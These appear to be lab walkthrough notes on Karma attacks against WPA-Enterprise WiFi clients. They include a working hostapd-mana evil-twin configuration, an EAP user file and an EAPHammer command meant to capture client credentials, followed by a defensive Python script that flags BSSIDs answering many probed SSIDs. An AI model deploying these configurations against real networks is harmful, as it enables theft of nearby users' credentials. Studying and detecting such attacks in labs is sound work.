Karma Attacks
Mana
Two dual-band WiFi interfaces are available on the lab machine. A few WiFi clients are present in the vicinity of the lab machine and probing for different networks. It is known that the probed networks are using WPA-ENT security configuration.
Objective: Deploy an evil twin using Hostapd-mana that can perform a Karma attack and make multiple clients join its network simultaneously, then retrieve the credentials.
Do the usual iw dev dance and check for networks with airodump-ng.
You can see that there are two clients probing.

Create the config file as per below:
interface=wlan1
ssid=FreeInternet
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1
enable_mana=1
Create the user file:
*    PEAP,TTLS,TLS,MD5,GTC
"t"  TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP  "1234test"  [2]
Start hostapd-mana with the config file and observe the client credentials in the log.

EAPHammer
Same iw dev dance as above, but this time start EAPHammer.
./eaphammer -i wlan1 --essid FreeInternet -c 1 --auth wpa-eap --karma


Observe the clients' creds in the log.
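
On the monitoring side, a Karma AP stands out because a single BSSID answers directed probe requests with whatever SSID each client asked for. The following is an added example, not part of the original lab notes or of either tool: it flags such BSSIDs in a constructed frame summary. The comma-separated input format, the MAC addresses, the SSIDs other than FreeInternet and the min_ssids threshold are assumptions.

```python
"""Flag BSSIDs that echo back many different SSIDs asked for in directed probes."""
from collections import defaultdict

# Constructed sample (not a real capture): frame type, transmitter, receiver, SSID.
SAMPLE_FRAMES = """\
probe-req,02:00:00:aa:00:01,ff:ff:ff:ff:ff:ff,CorpNet
probe-resp,02:00:00:bb:00:09,02:00:00:aa:00:01,CorpNet
probe-req,02:00:00:aa:00:02,ff:ff:ff:ff:ff:ff,CampusWiFi
probe-resp,02:00:00:bb:00:09,02:00:00:aa:00:02,CampusWiFi
probe-req,02:00:00:aa:00:02,ff:ff:ff:ff:ff:ff,
probe-resp,02:00:00:cc:00:05,02:00:00:aa:00:02,CampusWiFi
probe-resp,02:00:00:bb:00:09,02:00:00:aa:00:01,FreeInternet
"""


def parse_frames(text):
    """Yield (kind, transmitter, receiver, ssid) tuples, skipping malformed lines."""
    for line in text.splitlines():
        parts = line.strip().split(",", 3)  # SSID is last, so it may contain commas
        if len(parts) == 4 and parts[0] in ("probe-req", "probe-resp"):
            yield tuple(parts)


def find_karma_suspects(text, min_ssids=2):
    """Return {bssid: sorted SSIDs} for BSSIDs echoing >= min_ssids probed names.

    min_ssids is an assumed threshold; tune it against the local RF environment.
    """
    probed = defaultdict(set)  # client MAC -> SSIDs it asked for by name
    echoed = defaultdict(set)  # BSSID -> probed SSIDs it answered for
    for kind, tx, rx, ssid in parse_frames(text):
        if kind == "probe-req":
            if ssid:  # an empty SSID is a wildcard probe, not a directed one
                probed[tx].add(ssid)
        elif ssid in probed[rx]:  # response mirrors that client's own request
            echoed[tx].add(ssid)
    return {b: sorted(s) for b, s in echoed.items() if len(s) >= min_ssids}


if __name__ == "__main__":
    for bssid, ssids in find_karma_suspects(SAMPLE_FRAMES).items():
        print(f"possible Karma AP {bssid}: answered for {', '.join(ssids)}")
```

A response for an SSID the client never probed (the FreeInternet line in the sample) is not counted, and an AP that answers for only one probed name stays below the threshold.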
